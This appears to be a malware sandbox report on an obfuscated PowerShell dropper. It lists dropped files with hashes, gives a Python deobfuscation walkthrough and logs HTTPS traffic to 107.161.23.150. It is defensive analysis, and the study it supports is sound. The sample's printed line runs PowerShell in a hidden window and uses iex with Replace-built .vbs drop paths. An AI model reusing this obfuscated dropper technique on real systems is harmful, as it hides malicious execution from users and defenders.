                                                                                      Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                      Category:dropped
                                                                                      Size (bytes):386528
                                                                                      Entropy (8bit):7.9736851559892425
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                      MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                      SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                      SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                      SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                      Malicious:false
                                                                                      Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                      Category:dropped
                                                                                      Size (bytes):1419751
                                                                                      Entropy (8bit):7.976496077007677
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:/M7ouWLYZwYIGNPMGZfPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:RuWLYZwZGuGZn3mlind9i4ufFXpAXkru
                                                                                      MD5:EC8D4FAB55F24C0E344D263724846C4A
                                                                                      SHA1:5444D90F86D68A23AF7FB5434DEAE740D57D0312
                                                                                      SHA-256:E489C11D38BFF8F1F51351BAEBEE9F723A5C036DA0B0CB9C82306251017054EE
                                                                                      SHA-512:21018FD299944987654C202779C8E0185815868DE7179B814F145573EE8D45ACC33CA7E008CB23774C473DD7939E9D7D7C2E5A14E31D5EC62F7BFFDBBAB41F9A
                                                                                      Malicious:false
                                                                                      Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                                      Category:dropped
                                                                                      Size (bytes):1407294
                                                                                      Entropy (8bit):7.97605879016224
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:/M7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07tOWLaGZ4ZwYIGNPS:RB3mlind9i4ufFXpAXkrfUs0kWLaGZ48
                                                                                      MD5:1D64D25345DD73F100517644279994E6
                                                                                      SHA1:DE807F82098D469302955DCBE1A963CD6E887737
                                                                                      SHA-256:0A05C4CE0C4D8527D79A3C9CEE2A8B73475F53E18544622E4656C598BC814DFC
                                                                                      SHA-512:C0A37437F84B4895A7566E278046CFD50558AD84120CA0BD2EAD2259CA7A30BD67F0BDC4C043D73257773C607259A64B6F6AE4987C8B43BB47241F3C78EB9416
                                                                                      Malicious:false
                                                                                      Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):6224
                                                                                      Entropy (8bit):3.7326406163449413
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:H2Q3CzTbkvhkvCCtCEW1fIHgsFEW1fwHgsj:H2N7CzlsFzZsj
                                                                                      MD5:156BBD89DFFF3818460CEBE24B5742CF
                                                                                      SHA1:8B3DB4340335BFA163B9A9136F2DB87C41D9354A
                                                                                      SHA-256:4996C3146F0DEEA5E2FD4701F578ED054CDD1A0E63F8C79FEFC1590B5CBD47EF
                                                                                      SHA-512:2A244AF517A955C3CA18F8C74B289BE1EE67D0A2C11C0AACFEBCAB7A3FA271E3E8BBACB361EADCCF6A6373A3421056250BAB5BC03180CE099320C442E3CF7205
                                                                                      Malicious:false
                                                                                      Preview:...................................FL..................F.".. ...J.S.....'..R..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S........R....5..R......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.]...........................^.A.p.p.D.a.t.a...B.V.1......Y.]..Roaming.@......EW<2.Y.]..../.........................R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Y.]....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.Y.]....2......................^..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Y.]....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Y.]....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Y.]....u...........
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:PDF document, version 1.7 (zip deflate encoded)
                                                                                      Category:dropped
                                                                                      Size (bytes):871324
                                                                                      Entropy (8bit):7.827941732382635
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:H8QbZ2upCDtuOQKE7nmA3xWYT6LTA2D9dx5:HXpCST7ntB+jDTx5
                                                                                      MD5:CC648C9FBCD03EAC939663F24ED3AB02
SHA1:56F288BABF7DA8A89354140BC5A6C6D09CFEDCAD
SHA-256:F4A5A2657C465B26BB136761227F9D640CD156BABDE0CB78297429020EE1B3D3
SHA-512:5F27E7000A182D1477A7F9DD36AFA668380DE68EF78AC47575ED8414C7D92467B30FDD653DD3A2609CA4250EAAFBD6D56DA5DE375D189222C477346CE8B35AC7
Malicious:false
Preview:%PDF-1.7.%......129 0 obj.<</Linearized 1/L 653248/O 131/E 86423/N 5/T 652770/H [ 497 273]>>.endobj. ..143 0 obj.<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<E39576C475ABEC43A187B9D780C4757D><641CA28703C4B144886F342023B34532>]/Index[129 38]/Info 128 0 R/Length 89/Prev 652771/Root 130 0 R/Size 167/Type/XRef/W[1 3 1]>>stream..h.bbd`.``b``..".:@$S.X..D....'..n..l..d.....IFwf.x-...$..4f`..,.V..8.....7@.??.@....:.M..endstream.endobj.startxref..0..%%EOF.. ..165 0 obj.<</C 180/E 164/Filter/FlateDecode/I 202/Length 167/O 126/S 74/V 142>>stream..h.b```a``.d`e`H.g.b@.!.f.........uv..g..u..(;.p0..2.h..@....b..H..1/.X..FI.....,]..5.....1*...d....f.i......H.0p.Z..3..E..../.(C!..2p....L...pUF.._.CU...0..."...endstream.endobj.130 0 obj.<</AcroForm 144 0 R/Metadata 48 0 R/Names 145 0 R/Outlines 103 0 R/Pages 127 0 R/StructTreeRoot 117 0 R/Type/Catalog>>.endobj.131 0 obj.<</Contents 132 0 R/CropBox[0 0 595.44 841.68]/Group<</CS/DeviceRGB/S/Transparency/T

Process:C:\Windows\System32\svchost.exe
File Type:JSON data
Category:dropped
Size (bytes):55
Entropy (8bit):4.306461250274409
Encrypted:false
SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:DCA83F08D448911A14C22EBCACC5AD57
SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:false
Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
File type:ASCII text, with very long lines (841), with no line terminators
Entropy (8bit):5.406519064537952
TrID:
File name:1M1QoJF40r.ps1
File size:841 bytes
MD5:038e1ec475d16db5d36b71e12dbc5874
SHA1:a5b86b7e287cc13b3a6620eeac6ae6664949f68d
SHA256:a63c8dacfe1337cf5d0654c19c97c35068cd6a257220ef56d3a51402e4f83862
SHA512:5fccd228da3a3c4c7815e4c278d0f657d1470c3c00b59cc5b99ae550e88d067498873eb073fab9331914c5ab9ab44721b78e2801b1071adfe386f7e34b082e42
SSDEEP:24:X53Qr1qIjWIr0L+Nl7QWAa6Kz8Wjzo2bry:pgBzKIrzGKz8WPoWy
TLSH:E90152CDB5C356EB6740F89550CD863D3237C229B4E600E1B2B9460F21ACB3C0E81736
File Content Preview:powershell -win hidden $n31j81=iex($('[Environment]::GetEcmts'''.Replace('cmt','nvironmentVariable(''public'') + ''\\uipw9v.vb')));$flol=iex($('[Environment]::GetEcmts'''.Replace('cmt','nvironmentVariable(''public'') + ''\\zb6.vb')));function getit([strin
Icon Hash:3270d6baae77db44
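The File Content Preview above shows how the sample hides its drop paths: each is built from a single-quoted literal ending in "GetEcmts'" whose "cmt" is swapped by .Replace() for "nvironmentVariable('public') + '\\<name>.vb", so the leftover "s" closes the ".vbs" extension, and the result is handed to iex (Invoke-Expression) with the window hidden (-win hidden). The Python below is an added example, not part of the Joe Sandbox report: it folds those Replace() calls statically and resolves the GetEnvironmentVariable('public') + suffix expressions to concrete paths, so the dropped-file names can be recovered without running the script. It handles only the single-quoted literal and .Replace() forms the preview uses; the PUBLIC value is an assumption for illustration.

```python
"""Static folding of the Replace()-based string building used in the sample's
File Content Preview (added example; not code from the Joe Sandbox report)."""
import re

# Constructed input: the first two statements from the preview, verbatim.
SAMPLE = r"""powershell -win hidden $n31j81=iex($('[Environment]::GetEcmts'''.Replace('cmt','nvironmentVariable(''public'') + ''\\uipw9v.vb')));$flol=iex($('[Environment]::GetEcmts'''.Replace('cmt','nvironmentVariable(''public'') + ''\\zb6.vb')));"""

# Assumed environment for resolving the path; a real host may differ.
ENV = {"PUBLIC": r"C:\Users\Public"}

# A PowerShell single-quoted literal: no escapes except '' for one quote.
PS_SQ = r"'((?:[^']|'')*)'"

# '<lit>'.Replace('<old>','<new>')  -- the only construct the preview relies on.
REPLACE_RE = re.compile(
    rf"{PS_SQ}\.Replace\(\s*{PS_SQ}\s*,\s*{PS_SQ}\s*\)", re.IGNORECASE
)

# [Environment]::GetEnvironmentVariable('<var>') + '<suffix>'
GETENV_RE = re.compile(
    r"\[Environment\]::GetEnvironmentVariable\('([^']*)'\)\s*\+\s*'([^']*)'",
    re.IGNORECASE,
)


def ps_unquote(body: str) -> str:
    """Runtime value of the body of a PowerShell single-quoted literal."""
    return body.replace("''", "'")


def fold_replace(expr: str) -> str:
    """Evaluate every '<lit>'.Replace('old','new') in expr without running it.

    The trick in the sample: the literal ends in "cmts'" and the replacement
    text ends in ".vb", so the leftover "s" completes the ".vbs" extension.
    """
    def _fold(m: re.Match) -> str:
        lit, old, new = (ps_unquote(g) for g in m.groups())
        return lit.replace(old, new)
    return REPLACE_RE.sub(_fold, expr)


def dropper_paths(script: str, env: dict) -> list:
    """Fold the script, then resolve each GetEnvironmentVariable()+suffix path."""
    folded = fold_replace(script)
    return [
        env[var.upper()] + suffix
        for var, suffix in GETENV_RE.findall(folded)
        if var.upper() in env
    ]


if __name__ == "__main__":
    print(fold_replace(SAMPLE))
    for p in dropper_paths(SAMPLE, ENV):
        print("drop path:", p)
```

Folding yields `[Environment]::GetEnvironmentVariable('public') + '\\uipw9v.vbs'` and the same for `zb6.vbs`, i.e. two VBScript files under the Public profile; the doubled backslash survives because PowerShell single-quoted strings do not treat backslash as an escape, and Win32 path normalisation tolerates the repeated separator. The preview is cut off at `function getit([strin`, so what those .vbs files contain is not recoverable from this page.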
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Dec 19, 2024 12:47:58.833446980 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:47:58.833512068 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:47:58.833651066 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:47:58.843811035 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:47:58.843831062 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:00.095695972 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:00.095808029 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:00.097599030 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:00.097614050 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:00.097845078 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:00.104995966 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:00.151326895 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:00.539187908 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:00.586987972 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:00.659306049 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:00.659331083 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:00.659358978 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:00.659377098 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:00.659384012 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:00.659390926 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:00.659416914 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:00.659440041 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:00.659446001 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:00.659476995 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:00.770440102 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:00.770467997 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:00.770553112 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:00.770632029 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:00.770678043 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:00.770678043 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:00.819361925 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:00.819396019 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:00.819452047 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:00.819473028 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:00.821677923 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:00.821677923 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:00.943891048 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:00.943912983 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:00.943970919 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:00.943981886 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:00.944020033 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:00.971517086 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:00.971538067 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:00.971601009 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:00.971611023 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:00.971646070 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:00.994800091 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:00.994817972 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:00.994863987 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:00.994869947 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:00.994911909 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.023852110 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.023871899 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.023932934 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.023945093 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.023983955 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.131134033 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.131160021 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.131198883 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.131222010 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.131239891 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.131258011 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.151055098 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.151072979 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.151115894 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.151137114 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.151154995 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.151173115 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.167120934 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.167196035 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.167208910 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.167222977 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.167248964 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.167273045 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.185091972 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.185158968 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.185162067 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.185194016 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.185213089 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.185229063 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.202980995 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.203032970 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.203054905 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.203068972 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.203094959 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.203111887 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.218704939 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.218759060 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.218791962 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.218826056 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.218842983 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.218864918 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.309046030 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.309073925 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.309151888 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.309186935 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.309222937 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.321722031 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.321748972 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.321799994 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.321815968 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.321855068 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.334902048 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.334927082 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.334981918 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.334995985 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.335030079 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.335048914 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.345900059 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.345925093 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.345973969 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.345983982 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.346024036 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.357367039 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.357402086 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.357441902 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.357454062 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.357501984 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.365098000 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.365128040 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.365161896 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.365174055 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.365211010 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.371870041 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.371897936 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.371963024 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.371975899 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.372009993 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.377990961 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.378022909 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.378078938 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.378089905 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.378130913 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.501430988 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.501506090 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.501584053 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.501637936 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.501677990 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.501811028 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.507242918 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.507293940 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.507329941 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.507354975 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.507360935 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.507417917 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.513062954 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.513118029 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.513142109 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.513154984 CET  443          49710      107.161.23.150  192.168.2.6
